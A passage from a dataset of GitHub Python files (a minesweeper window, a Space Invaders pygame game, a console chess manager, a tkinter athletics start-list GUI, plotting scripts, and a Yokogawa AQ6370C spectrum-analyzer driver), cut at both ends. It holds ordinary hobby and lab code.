Difficulty(config['SETTINGS']['difficulty']))\r\n self.__difficulty__ = Difficulty(config['SETTINGS']['difficulty'])\r\n self.parameters = {\r\n 'paddings': 0,\r\n 'MSCounter_width': 0,\r\n 'MSCounter_height': 0,\r\n 'MSRestart_Button_size': 0,\r\n 'offset': 0\r\n }\r\n self.__surface_width__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.columns\r\n self.__surface_height__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.rows\r\n super(MSWindow, self).__init__()\r\n self.setWindowIcon(QIcon('icons/icon.png'))\r\n\r\n self.menubar = self.menuBar()\r\n gameMenu = self.menubar.addMenu('Game')\r\n gameMenuActions = QActionGroup(self)\r\n for panel in ['Settings']:\r\n action = QAction('Settings', self)\r\n gameMenuActions.addAction(action)\r\n gameMenu.addAction(action)\r\n gameMenu.triggered.connect(lambda: self.__difficulty_input__.show())\r\n\r\n self.setFixedSize(self.__surface_width__ + paddings * 2,\r\n self.__surface_height__ + panel_size + paddings * 2 + self.menubar.height())\r\n windowWidget = QWidget()\r\n windowLayout = QVBoxLayout()\r\n windowLayout.setContentsMargins(paddings, paddings, paddings, paddings)\r\n windowLayout.setAlignment(Qt.AlignmentFlag.AlignCenter)\r\n windowWidget.setLayout(windowLayout)\r\n self.setCentralWidget(windowWidget)\r\n\r\n panelLayout = QGridLayout()\r\n panelLayout.setContentsMargins(1, 0, 1, 0)\r\n self.fieldWidget = QLabel()\r\n self.fieldWidget.setScaledContents(True)\r\n self.fieldWidget.setMinimumSize(self.__surface_width__, self.__surface_height__)\r\n\r\n self.minesWidget = LCDCounter()\r\n self.restartWidget = RestartButton()\r\n self.restartWidget.clicked.connect(self.restart)\r\n self.timerWidget = LCDCounter()\r\n\r\n spliter = QSpacerItem(40, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum)\r\n panelLayout.addWidget(self.minesWidget, 0, 0)\r\n panelLayout.addItem(spliter, 0, 1)\r\n panelLayout.addWidget(self.restartWidget, 0, 3)\r\n panelLayout.addItem(spliter, 0, 4)\r\n panelLayout.addWidget(self.timerWidget, 0, 5)\r\n\r\n windowLayout.addLayout(panelLayout)\r\n windowLayout.addWidget(self.fieldWidget)\r\n\r\n def convert_coordinates(self, x, y) -> tuple:\r\n offset = int(int(config['DEFAULT']['cell_size'])/5)\r\n y_offset = panel_size + paddings * 3 + offset\r\n if (paddings < x < self.width() - paddings) and \\\r\n (y_offset < y < self.height() - paddings - 1):\r\n x -= paddings\r\n y -= y_offset\r\n return x, y\r\n return None, None\r\n\r\n def mousePressEvent(self, click: QMouseEvent) -> None:\r\n if click.button() in (Qt.MouseButton.LeftButton, Qt.MouseButton.RightButton):\r\n x, y = self.convert_coordinates(click.pos().x(), click.pos().y())\r\n if x is None or y is None:\r\n return\r\n if click.button() is Qt.MouseButton.LeftButton:\r\n self.__mouse_event__ = (x, y, 'l')\r\n else:\r\n self.__mouse_event__ = (x, y, 'r')\r\n\r\n def mouseDoubleClickEvent(self, click: QMouseEvent) -> None:\r\n if click.button() is Qt.MouseButton.RightButton:\r\n x, y = self.convert_coordinates(click.pos().x(), click.pos().y())\r\n if x is None or y is None:\r\n return\r\n self.__mouse_event__ = (x, y, '?')\r\n\r\n def restart(self):\r\n self.__need_to_restart__ = True\r\n self.timerWidget.clear()\r\n self.__surface_width__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.columns\r\n self.__surface_height__ = int(config['DEFAULT']['cell_size']) * self.__difficulty__.rows\r\n self.setFixedSize(self.__surface_width__ + paddings * 2,\r\n self.__surface_height__ + panel_size + paddings * 2.8 + self.menubar.height())\r\n\r\n def closeEvent(self, close: QCloseEvent) -> None:\r\n sys.exit()\r\n# ----------------------------------------------------------------------------------------------------------------------","repo_name":"kopytlyanka/FEFU-Summer-practice-2022","sub_path":"2 неделя/minesweeperV4/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":11231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39971668927","text":"import pygame, sys, Obstacles\r\nfrom player import player\r\nfrom Alien import alien, extra\r\nfrom random import choice, randint\r\nfrom laser import laser\r\n\r\nclass game:\r\n def __init__(self):\r\n #player's setup\r\n player_sprite = player((screen_width / 2 , screen_height), screen_width , 5)\r\n self.player = pygame.sprite.GroupSingle(player_sprite)\r\n\r\n #obstacles' setup\r\n self.shape = Obstacles.shape\r\n self.block_size = 5\r\n self.blocks = pygame.sprite.Group()\r\n self.obstacle_amount = 4\r\n self.obstacle_x_position = [num * (screen_width / self.obstacle_amount) for num in range(self.obstacle_amount)]\r\n self.create_multiple_obstacles(*self.obstacle_x_position, x_start = screen_width / 15, y_start = 480)\r\n\r\n #alien's setup\r\n self.aliens = pygame.sprite.Group()\r\n self.alien_lasers = pygame.sprite.Group()\r\n self.alien_setup(rows = 6, cols = 8)\r\n self.alien_direction = 1\r\n\r\n #Extra's setup\r\n self.extra = pygame.sprite.GroupSingle()\r\n self.extra_spawn_time = randint(40, 80)\r\n\r\n #Health & score setup\r\n self.lives = 3\r\n self.live_surf = pygame.image.load('Graphics/player.png').convert_alpha()\r\n self.live_x_start_pos = screen_width - (self.live_surf.get_size()[0] * 2 + 20)\r\n self.score = 0\r\n self.font = pygame.font.Font('Graphics/prstart.ttf', 20)\r\n\r\n # Audio's setup\r\n\r\n music = pygame.mixer.Sound('Graphics/2019-12-11_-_Retro_Platforming_-_David_Fesliyan.mp3')\r\n music.set_volume(0.6)\r\n music.play(loops = -1)\r\n\r\n self.exS = pygame.mixer.Sound('Graphics/verycoolandopbeatupexplosionsound.wav')\r\n self.exS.set_volume(0.11)\r\n\r\n \r\n self.pl_music = pygame.mixer.Sound('Graphics/veryopandstronglaserbeamthatsoundlikeagun.mp3')\r\n self.pl_music.set_volume(0.55)\r\n \r\n def create_obstacle(self, x_start, y_start, offset_x):\r\n for row_index, row in enumerate(self.shape):\r\n for col_index, col in enumerate(row):\r\n if col == 'x':\r\n x = x_start + col_index * self.block_size + offset_x\r\n y = y_start + row_index * self.block_size\r\n block = Obstacles.Block(self.block_size, (241,79,80), x, y)\r\n self.blocks.add(block)\r\n\r\n def create_multiple_obstacles(self, *offset, x_start, y_start):\r\n for offset_x in offset:\r\n self.create_obstacle(x_start, y_start, offset_x )\r\n\r\n def alien_setup(self, rows, cols, x_distance = 60, y_distance = 48, x_offset = 70, y_offset = 100):\r\n for row_index, row in enumerate(range(rows)):\r\n for col_index, col in enumerate(range(cols)):\r\n x = col_index * x_distance + x_offset\r\n y = row_index * y_distance + y_offset\r\n\r\n if row_index == 0: alien_sprite = alien('yellow',x,y)\r\n\r\n elif 1 <= row_index <= 2: alien_sprite = alien('green', x,y)\r\n\r\n else: alien_sprite = alien('red',x,y)\r\n\r\n self.aliens.add(alien_sprite)\r\n\r\n def alien_position_checker(self):\r\n all_aliens = self.aliens.sprites()\r\n\r\n for alien in all_aliens:\r\n if alien.rect.right >= screen_width:\r\n self.alien_direction = -1\r\n self.alien_move_down(2)\r\n\r\n elif alien.rect.left <= 0:\r\n self.alien_direction = 1\r\n self.alien_move_down(2)\r\n\r\n def alien_move_down(self, distance):\r\n if self.aliens:\r\n for alien in self.aliens.sprites():\r\n alien.rect.y += distance\r\n\r\n def alien_shoot(self):\r\n if self.aliens.sprites():\r\n random_alien = choice(self.aliens.sprites())\r\n laser_sprite = laser(random_alien.rect.center, 6, screen_height)\r\n self.alien_lasers.add(laser_sprite)\r\n self.pl_music.play()\r\n\r\n def extra_alien_timer(self):\r\n self.extra_spawn_time -= 1\r\n\r\n if self.extra_spawn_time <= 0:\r\n self.extra.add(extra(choice(['right', 'left']),screen_width))\r\n self.extra_spawn_time = randint(400, 800)\r\n\r\n def check_collision(self):\r\n\r\n #player's lasers\r\n if self.player.sprite.laser:\r\n for laser in self.player.sprite.laser:\r\n #obstacles' collision\r\n if pygame.sprite.spritecollide(laser, self.blocks, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #aliens' collision\r\n aliens_hit = pygame.sprite.spritecollide(laser, self.aliens, True)\r\n\r\n if aliens_hit:\r\n for alien in aliens_hit:\r\n self.score += alien.value\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #extra's collision\r\n if pygame.sprite.spritecollide(laser, self.extra, True):\r\n laser.kill()\r\n self.score += 500\r\n self.exS.play()\r\n\r\n if pygame.sprite.spritecollide(laser, self.alien_lasers, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #aliens' laser\r\n\r\n if self.alien_lasers:\r\n for laser in self.alien_lasers:\r\n\r\n #obstacles' collision\r\n if pygame.sprite.spritecollide(laser, self.blocks, True):\r\n laser.kill()\r\n self.exS.play()\r\n\r\n #player's collision\r\n if pygame.sprite.spritecollide(laser, self.player, False):\r\n laser.kill()\r\n self.lives -= 1\r\n\r\n if self.lives <= 0:\r\n self.exS.play()\r\n pygame.quit()\r\n sys.exit()\r\n\r\n #aliens\r\n\r\n if self.aliens:\r\n for alien in self.aliens:\r\n pygame.sprite.spritecollide(alien, self.blocks, True)\r\n\r\n if pygame.sprite.spritecollide(alien, self.player, False):\r\n pygame.quit()\r\n sys.exit()\r\n\r\n def display_lives(self):\r\n for live in range(self.lives - 1):\r\n\r\n x = self.live_x_start_pos + (live * (self.live_surf.get_size()[0] + 10))\r\n\r\n screen.blit(self.live_surf, (x,8))\r\n\r\n def display_score(self):\r\n score_surf = self.font.render(f'score: {self.score}', False, 'white')\r\n score_rect = score_surf.get_rect(topleft = (0,0))\r\n screen.blit(score_surf, score_rect)\r\n\r\n def victory_screen(self):\r\n if not self.aliens.sprites():\r\n victory_surf = self.font.render('You won!', False, 'white')\r\n victory_rect = victory_surf.get_rect(center = (screen_width / 2, screen_height / 2))\r\n screen.blit(victory_surf, victory_rect)\r\n\r\n def run(self):\r\n\r\n #Update\r\n self.player.update()\r\n self.alien_lasers.update()\r\n self.aliens.update(self.alien_direction)\r\n self.extra.update()\r\n\r\n self.alien_position_checker()\r\n self.extra_alien_timer()\r\n self.check_collision()\r\n\r\n #Player's\r\n self.player.sprite.laser.draw(screen)\r\n self.player.draw(screen)\r\n\r\n #Block's\r\n self.blocks.draw(screen)\r\n\r\n #Alien's\r\n self.aliens.draw(screen)\r\n self.alien_lasers.draw(screen)\r\n self.extra.draw(screen)\r\n\r\n #Score and lives\r\n self.display_lives()\r\n self.display_score()\r\n self.victory_screen()\r\n\r\nclass CRT(game):\r\n def __init__(self):\r\n self.tv = pygame.image.load('Graphics/tv.png').convert_alpha()\r\n self.tv = pygame.transform.scale(self.tv, (screen_width, screen_height))\r\n\r\n def create_crt_lines(self):\r\n line_height = 3\r\n line_amount = int(screen_height / line_height)\r\n\r\n for line in range(line_amount):\r\n y_pos = line * line_height\r\n pygame.draw.line(self.tv, 'black', (0, y_pos), (screen_width, y_pos), 1)\r\n\r\n def draw(self):\r\n self.tv.set_alpha(randint(75, 90))\r\n self.create_crt_lines()\r\n screen.blit(self.tv,(0,0))\r\n\r\nif __name__ == '__main__':\r\n pygame.init()\r\n\r\n screen_width = 600\r\n screen_height = 600\r\n\r\n screen = pygame.display.set_mode((screen_width, screen_height))\r\n clock = pygame.time.Clock()\r\n caption = pygame.display.set_caption('Space Invader')\r\n icon = pygame.image.load('Graphics/SI_icon.ico')\r\n setIcon = pygame.display.set_icon(icon)\r\n\r\n game = game()\r\n crt = CRT()\r\n\r\n alienlaser = pygame.USEREVENT + 1\r\n pygame.time.set_timer(alienlaser, 800)\r\n\r\n while True:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == alienlaser:\r\n game.alien_shoot()\r\n\r\n screen.fill((30,30,30))\r\n\r\n game.run()\r\n crt.draw()\r\n\r\n pygame.display.flip()\r\n\r\n clock.tick(60)","repo_name":"LoafDev/Space-Invader","sub_path":"SI.py","file_name":"SI.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8740316917","text":"import sys\nimport os\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\n\nclass listWidgetClass(QListWidget):\n def __init__(self):\n super(listWidgetClass, self).__init__()\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setDragDropMode(QAbstractItemView.DropOnly)\n\n def dropEvent(self, event):\n print('DROP', type(event)) # type event est' QDropEvent i samoe glavnoe shto on delaet on vozvrachaet mimedata\n mimedata = event.mimeData()\n print(mimedata)\n if mimedata.hasUrls():\n print(mimedata.urls())\n\n def dragEnterEvent(self, event):\n event.accept()\n # print 'ENTER', type(event)\n\n def dragMoveEvent(self, event):\n # print 'MOVE', type(event)\n pass\n\nif __name__ == '__main__':\n app = QApplication([])\n w = listWidgetClass()\n w.show()\n app.exec_()","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/Advanced_Python_Scripting/012_Drag&Drop/dnd_widget2.py","file_name":"dnd_widget2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41834566648","text":"'''\nthis class handles actions a player can do \n'''\nfrom enum import Enum\nfrom functools import partial\nfrom display import Display\nfrom game_state import game_state\nfrom pieces import Piece\nfrom curses import *\nfrom curses.textpad import Textbox\n\ndisplay = Display()\n \nclass Action(Enum):\n MOVE = 'move',\n VALID_MOVES = 'valid_moves'\n\nclass GameManager:\n '''\n class to handle game state\n ''' \n def handle_action(self, action: Action):\n '''\n handles action sets players turn \n\n '''\n if action: \n self.modify_state(action)\n\n game_state.its_whites_turn = not game_state.its_whites_turn if action[0] is Action.MOVE else game_state.its_whites_turn\n game_state.current_party = game_state.white_party if game_state.its_whites_turn else game_state.red_party\n \n\n def handle_move(self, piece, destination): \n attacked_piece = self.check_if_empty(destination, party=game_state.get_non_current_party(), return_piece=True)\n game_state.current_party.move(piece, destination)\n if type(attacked_piece) != bool: \n game_state.get_non_current_party().pieces.remove(attacked_piece)\n game_state.apply()\n \n\n def modify_state(self, action: Action):\n '''\n gets validated acion as input and modifies, applies game state\n '''\n {\n Action.MOVE: partial(self.handle_move, action[1], action[2]),\n Action.VALID_MOVES: partial(self.request_valid_moves, action[2])\n }.get(action[0], False)()\n game_state.apply() \n\n \n def request_valid_moves(self, valid_moves: list): \n '''\n sets request in the game state to tell the display to draw the valid moves \n '''\n game_state.requests['valid_moves']['requested'] = True\n game_state.requests['valid_moves']['value'] = valid_moves\n\n\n def request_action(self): \n editwin = newwin(1, 15, 20, 0)\n # stdscr.addstr('\\n')\n box = Textbox(editwin)\n noecho()\n \n actioned = False\n while not actioned: \n box.edit()\n _input = box.gather()\n # _input = getstr('white: ') if game_state.its_whites_turn else input('red: ')\n action = self.validate_input(_input)\n actioned = True if action else False\n return action\n \n\n def validate_input(self, input: str): \n '''\n filters commands and turns them into actions \n commands: \n 1. position, !valid moves: position defines a piece, !valid moves command shows what moves the defined piece can take,\n 2. position, destination: position defines a piece, destination defines where the player wants to move the defined piece \n ''' \n position = input.split()[0]\n command = ' '.join(word for word in input.split()[1:])\n\n # selected piece\n position_x = int(position[0]) \n position_y = game_state.current_party.get_position(position[1])\n position = (position_x - 1, position_y - 1) if position_y else False\n\n # 1st command\n if command == '!valid moves':\n piece = game_state.current_party.find_piece(position)\n valid_positions = self.get_valid_positions(piece, position) \n return (Action.VALID_MOVES, piece, valid_positions) if piece else False \n \n # 2nd command\n destination_x = int(command[0])\n destination_y = game_state.current_party.get_position(command[1])\n destination = (destination_x - 1, destination_y - 1) if destination_y else False\n\n if not position_y or not destination_y: \n return False\n\n piece = game_state.current_party.find_piece(position)\n if not piece: \n return False\n\n valid_positions = self.get_valid_positions(piece, position) \n print(destination)\n return (Action.MOVE, piece, destination) if destination in valid_positions else False \n\n \n def get_valid_positions(self, piece: Piece, position: tuple): \n '''\n returns all valid moves the piece can do from that position\n '''\n valid_positions = piece.get_valid_moves(self.check_if_empty)\n return self.filter_empty_positions(valid_positions)\n \n\n def filter_empty_positions(self, positions: list):\n '''\n gets possible positions a piece can move to and checks if they are empty\n '''\n empty_positions = []\n for position in positions:\n empty = True \n for piece in game_state.current_party.pieces:\n if position == piece.position:\n empty = False\n if empty: \n empty_positions.append(position)\n return empty_positions\n \n\n def check_if_empty(self, position: tuple, party: int, return_piece=False):\n '''\n used in piece objects if they need a special check if a position is empty \n '''\n party = game_state.red_party if party is 1 else game_state.white_party\n for piece in party.pieces:\n if piece.position == position:\n return False if not return_piece else piece\n return True\n \n","repo_name":"micr0tubule/console-chess","sub_path":"game_manager.py","file_name":"game_manager.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19649558296","text":"\nx = input('Enter a file name:')\n\ntry:\n\thandle = open(x)\nexcept:\n\tprint('File', x, 'cannot be accessed') \n\texit()\n\nwordsd = dict()\nfor line in handle:\n\tline = line.lower()\n\tfor l in line:\n\t\tif l not in 'abcdefghijklmnopqrstuvwxyz': continue\n\t\tif l not in wordsd:\n\t\t\twordsd[l] = 1\n\t\telse:\n\t\t\twordsd[l] += 1\n\nsortlist = list()\nfor key, valu in wordsd.items():\n\tsortlist.append( (valu, key) )\nsortlist.sort(reverse = True)\n\nfor key, valu in sortlist :\n\t\tprint(key, valu)\n\n","repo_name":"rtotheroh/class-work","sub_path":"10.3.py","file_name":"10.3.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21684798851","text":"import tkinter as tk\nfrom sqlclass import sqlting\nfrom athleat import athlete\nimport event as event\n\nclass startlstclass:\n\n def startlst_layout(startwindow, eventobj):\n sqlclassobj = sqlting()\n sqlclassobj.connect()\n sqlclassobj.createdictcursor()\n query = \"SELECT AthleatName, Lastname, TeamName, RegistrationTime FROM ATHLEATS INNER JOIN EVENT ON ATHLEATS.EventID = EVENT.ID AND EVENT.CompetitionID = %s AND ATHLEATS.EventID = %s ORDER BY RegistrationTime ASC\"\n values = (eventobj.competitionid, eventobj.id)\n #print(values)\n try:\n sqlclassobj.mycursor.execute(query, values)\n startlst = sqlclassobj.mycursor.fetchall()\n except:\n print(\"Error: Could not fetch data\")\n sqlclassobj.close()\n\n addeventbutton = tk.Button(startwindow, text=\"Add athleat\", command= lambda: startlstclass.addathleatbutton_click(startwindow, eventobj))\n addeventbutton.grid(row=0, column=0)\n\n i = 1\n for x in startlst:\n y = 0\n if i==1:\n for k in x.keys():\n e = tk.Label(startwindow, width=20, text = k, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n y = 0\n for key, value in x.items():\n e = tk.Label(startwindow, width=20, fg='blue', text = x[key], relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n\n def startlstbutton_clicked(progwind, eventobj):\n \n startwindow = tk.Toplevel(progwind)\n startwindow.title(\"Start list\")\n\n startlstclass.startlst_layout(startwindow, eventobj)\n \n startwindow.mainloop()\n\n def heatlstbutton_clicked(progwind, eventobj):\n sqlclassobj = sqlting()\n sqlclassobj.connect()\n sqlclassobj.createdictcursor()\n\n myquery = \"CALL Generate_Heatlist(%s, %s);\"\n myvalues = (eventobj.competitionid, eventobj.id)\n sqlclassobj.mycursor.execute(myquery, myvalues)\n \n query = \"SELECT AthleatName, Lastname, TeamName, Heat, Lane, RegistrationTime FROM ATHLEATS INNER JOIN EVENT ON ATHLEATS.EventID = EVENT.ID AND EVENT.CompetitionID = %s AND ATHLEATS.EventID = %s ORDER BY Heat, Lane ASC\"\n values = (eventobj.competitionid, eventobj.id)\n\n sqlclassobj.mycursor.execute(query, values)\n startlst = sqlclassobj.mycursor.fetchall()\n sqlclassobj.close()\n\n heatwindow = tk.Toplevel(progwind)\n heatwindow.title(\"Heat list\") \n\n i = 1\n for x in startlst:\n y = 0\n if i==1:\n for k in x.keys():\n e = tk.Label(heatwindow, width=20, text = k, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n y = 0\n for key, value in x.items():\n e = tk.Label(heatwindow, width=20, fg='blue', text = x[key], relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=y)\n y += 1\n i += 1\n heatwindow.mainloop()\n\n def choosefilebutton_clicked(mylst): #fix this in the future\n #open file dialog (utforskaren) and choose file\n print(\"Choose file button was clicked!\")\n\n def saveathleatbutton_clicked(mylst): #fix this in the future by doing the same thing as in guiclass\n athobj = athlete(name=mylst[0].get(), lastname=mylst[1].get(), teamname=mylst[2].get(), gender=mylst[3].get(), age=mylst[4].get(), registrationtime=mylst[5].get())\n athobj.save() #uncomment this when change is wanted in database\n print(\"Save button was clicked!\")\n\n def savefromfilebutton_clicked(mylst): #fix this in the future\n print(\"Save from file button was clicked!\")\n\n def on_close_addathleat(wind, athleatwind, eventobj):\n startlstclass.startlst_layout(wind, eventobj)\n wind.update()\n athleatwind.destroy()\n\n def addathleatbutton_click(progwind, eventobj):\n mytup = (\"Name\", \"Last Name\", \"Team\", \"Gender\", \"Age\", \"Registration Time\")\n mylst = []\n athleatwind = tk.Toplevel(progwind)\n athleatwind.title(\"Add Athleat\")\n\n automaticadd = tk.Label(athleatwind, width=20, text = \"Automatic add athleats\", relief=\"ridge\", anchor=\"w\")\n automaticadd.grid(row=0, column=0)\n\n choosefilebutton = tk.Button(athleatwind, text=\"Choose file\", command= lambda: startlstclass.choosefilebutton_clicked(mylst))\n choosefilebutton.grid(row=1, column=0)\n\n myfilentry = tk.Entry(athleatwind, bd = 5, width=50)\n myfilentry.grid(row=1, column=1)\n\n savebutton = tk.Button(athleatwind, text=\"Save\", command= lambda: startlstclass.savefromfilebutton_clicked(mylst))\n savebutton.grid(row=2, column=1)\n\n automaticadd = tk.Label(athleatwind, width=20, text = \"Add athleats manually\", relief=\"ridge\", anchor=\"w\")\n automaticadd.grid(row=4, column=0)\n \n i=5\n for x in mytup:\n e = tk.Label(athleatwind, width=20, text = x, relief=\"ridge\", anchor=\"w\")\n e.grid(row=i, column=0)\n myentry = tk.Entry(athleatwind, bd = 5)\n myentry.grid(row=i, column=1)\n mylst.append(myentry)\n i += 1\n \n saveathleatbutton = tk.Button(athleatwind, text=\"Save\", command= lambda: startlstclass.saveathleatbutton_clicked(mylst))\n saveathleatbutton.grid(row=i, column=1)\n athleatwind.protocol(\"WM_DELETE_WINDOW\", lambda: startlstclass.on_close_addathleat(progwind, athleatwind, eventobj))\n athleatwind.mainloop()\n #print(\"Add athleat to event!\")\n\n #def editloop_returnrow(mywind, myobj, mylst, mytup, startrow):\n \n # return startrow","repo_name":"Bluefoux/DB_assignment","sub_path":"startlstgui.py","file_name":"startlstgui.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1055191446","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\npath = 'results_12_05_11_25.csv'\n\nutil_weight = 1\ntime_weight = 1\n\ndata = pd.read_csv(path)\n\ndata['Generation'] = (data['Generation'] + 1) * 5\n\nsns.set_style('whitegrid')\nsns.set(font_scale=1.2)\nplt.figure(figsize=(30, 30))\n\nfor col in ['Max Score', 'Mean Score', 'Min Score', 'Standard Deviation', 'Max Util', 'Min Time', 'Mean Util', 'Mean Time']:\n filename = f'Util{util_weight}_Weight{time_weight}_{col}.png'\n plot_path = os.path.join('..', 'plots', filename)\n g = sns.relplot(x=\"Generation\", y=col, kind=\"line\", data=data)\n g.savefig(plot_path)","repo_name":"joy-kitson/bus-routes","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70417878246","text":"''''\nPurpose : 在免授权场景下,探讨多个旋转算子对应子星座图的\nData : 2019/5/26\n备注:user_number = 6,旋转因子小于等于pi/7时,子星座图无重合\n'''\n\nimport numpy as np\nfrom math import*\nimport matplotlib.pyplot as plt\n\nJJ = 1j\n\n\ndef seq_buff():\n\n RF = pi/7\n seq_mat = np.zeros(6, dtype=complex)\n for i in range(len(seq_mat)):\n seq_mat[i] = cos(RF * i) + JJ * sin(RF * i)\n return seq_mat\n\n\ndef generate_standard(): # 每个Eb/N0的基础重复数量\n\n seq_mat = seq_buff()\n\n data_length = 1\n user_number = 6\n image_matrix = np.zeros(1, dtype=complex)\n label_matrix = np.zeros(user_number, dtype=complex)\n\n for i in range(2 ** user_number):\n # i = 2**length-i-1\n # 将值为0~2**length的十进制数转为二进制,之后去掉‘0b’的开头,并将二进制转为列表,此时列表内为字符\n j = list(bin(i).split('b')[1])\n # 将不满长度的列表部分补0`\n add = list(np.zeros([user_number - len(j)], dtype=int))\n add.extend(j)\n # 选择向量:将列表转为数组并将数据类型转为int,至此生成选择向量,0表示该沉默用户,1代表活跃用户\n j = np.array(add).astype(np.int)\n\n # 通过选择向量选择可能的导频序列进行叠加,即接受端可能收到的信号,共2**length种\n pilots = np.zeros(data_length)\n for jj in range(user_number):\n pilots = pilots + seq_mat[jj] * j[jj]\n\n image_matrix = np.row_stack((image_matrix, pilots))\n label_matrix = np.row_stack((label_matrix, j))\n\n return image_matrix[1:2**user_number+1], label_matrix[1:2**user_number+1]\n\n# 验证用户组合是否有重复数据\ndef validation():\n image,label = generate_standard()\n print(image.shape)\n print(label.shape)\n count = 0\n\n for i in range(len(image)-1):\n for j in range(len(image)-1-i):\n if ((np.round(image[i].real, 2) == np.round(image[i+j+1].real, 2))\n &(np.round(image[i].imag, 2) ==np.round(image[i+j+1].imag,2))):\n count = count + 1\n print(count)\n\n\nif __name__=='__main__':\n\n validation()\n image , label= generate_standard()\n plt.scatter(image.real, image.imag)\n plt.show()\n\n","repo_name":"Irwng/Random-Access-ANN","sub_path":"normal/subconstell_grantfree.py","file_name":"subconstell_grantfree.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30809830210","text":"import time\n\nimport numpy as np\n\nfrom LabExT.Instruments.InstrumentAPI import Instrument, InstrumentException\n\n\nclass OpticalSpectrumAnalyzerAQ6370C(Instrument):\n \"\"\"\n ## OpticalSpectrumAnalyzerAQ6370C\n\n This class provides an interface to a Yokogawa AQ6370C optical spectrum analyzer. See the following two links for\n the users and programmers guide:\n\n * [User Manual](https://cdn.tmi.yokogawa.com/IMAQ6370C-01EN.pdf)\n * [Programmer / Remote Control Manual](https://cdn.tmi.yokogawa.com/1/6057/files/IMAQ6370C-17EN.pdf)\n\n #### Properties\n\n handbook page refers to: Yokogawa AQ6370C Remote Control Manual (IMAQ6370C-17EN.pdf)\n\n | property type | datatype | read/write | page in handbook | unit | description |\n |------------------|----------|------------|------------------|------|-------------------------------------------------------------------|\n | startwavelength | float | rw | 7-88 | nm | Sets/queries the measurement start wavelength. |\n | stopwavelength | float | rw | 7-88 | nm | Sets/queries the measurement stop wavelength. |\n | centerwavelength | float | rw | 7-87 | nm | Sets/queries the measurement center wavelength. |\n | spam | float | rw | 7-87 | nm | Sets/queries the measurement span. |\n | sweepresolution | float | rw | 7-85 | nm | Sets/queries the measurement resolution (between 0.02nm and 2nm). |\n | n_points | int | rw | 7-86 | | Sets/queries the number of samples measured per sweep. |\n | sens_mode | str | r | 7-85 | | Queries the sensitivity setting of the OSA, see below. |\n\n The sensitivity modes is any of: 'NHLD', 'NAUT', 'MID', 'HIGH1', 'HIGH2', 'HIGH3', 'NORM'.\n\n #### Methods\n * **run**: triggers a new measurement and waits until the sweep is over\n * **stop**: stops sweeping\n * **get_data**: downloads the wavelength and power data of the last measurement\n\n \"\"\"\n\n ignored_SCPI_error_numbers = [0, 2]\n\n def __init__(self, *args, **kwargs):\n # call Instrument constructor, creates VISA instrument\n super().__init__(*args, **kwargs)\n\n self.sens_modes = ['NHLD', 'NAUT', 'MID', 'HIGH1', 'HIGH2', 'HIGH3', 'NORM']\n self._sweep_modes = ['SING', 'REP', 'AUTO', 'SEGM']\n self._traces = ['TRA', 'TRB', 'TRC', 'TRD', 'TRE', 'TRF', 'TRG']\n\n self._net_timeout_ms = kwargs.get(\"net_timeout_ms\", 30000)\n\n self.networked_instrument_properties.extend([\n 'startwavelength',\n 'stopwavelength',\n 'centerwavelength',\n 'sweepresolution',\n 'n_points',\n 'sens_mode',\n '_sweep_mode',\n '_active_trace'\n ])\n\n def open(self):\n \"\"\"\n Open the connection to the instrument. Automatically re-uses any old connection if it is already open.\n\n :return: None\n \"\"\"\n super().open()\n\n self._inst.read_termination = '\\r\\n'\n\n authentication = self._inst.query('open \"anonymous\"')\n ready = self._inst.query(\" \")\n\n if authentication != 'AUTHENTICATE CRAM-MD5.' or ready != 'ready':\n raise InstrumentException('Authentication failed')\n\n #\n # run / stop / get data\n #\n\n def run(self, measurement_type='single'):\n \"\"\"\n Starts a measurement and returns the currently active trace (between 1 and 7)\n Valid Types are: \"singe\" (default), \"auto\", \"repeat\".\n :return: active trace number\n \"\"\"\n self.logger.info('Starting {type} sweep'.format(type=measurement_type))\n\n if measurement_type.lower() == 'single':\n # set sens mode\n # self.command(':SENS:SENS NORM')\n self._sweep_mode = 'SING'\n self.clear()\n self.write(':INIT')\n\n # Wait for sweep to finish\n operation_event = 0\n while not (operation_event & 0b1):\n time.sleep(1)\n operation_event = int(self.query(':STAT:OPER:EVEN?'))\n self.logger.info('Waiting for OSA to finish sweep...')\n\n 